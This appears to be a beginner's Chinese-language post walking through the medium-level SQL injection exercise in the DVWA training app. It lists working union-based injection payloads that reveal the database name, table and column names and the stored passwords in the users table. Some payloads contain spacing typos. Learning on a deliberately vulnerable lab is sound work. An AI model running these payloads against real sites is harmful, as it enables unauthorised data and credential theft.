DVWA 的Sql injection 中的medium参考方法
(初学者,方法不一定对,只是参考,有不对的欢迎评论区指错)
1.是用页面注入完成的 右键Submit,选择Inspect,找到User ID,就可以改参数了
2.恒真条件 1 or 1=1
3.看数据库名 1 union select 1,database()
4.查询语句字段数 1 or 1=1 order by 1#
5.显示表名 1 union select1,group_concat(table_name) from information_schema.tables
6.显示密码 1 union select1,group_concat(password) from users
7.获取表中的字段名 1 union select1,group_concat(column_name) from information_schema.columns
注意:在网页输入的语法和学的不太一样。第一是没有单引号,是因为单引号会被转义。第二是没有where条件,是因为这样可以饶过单引号。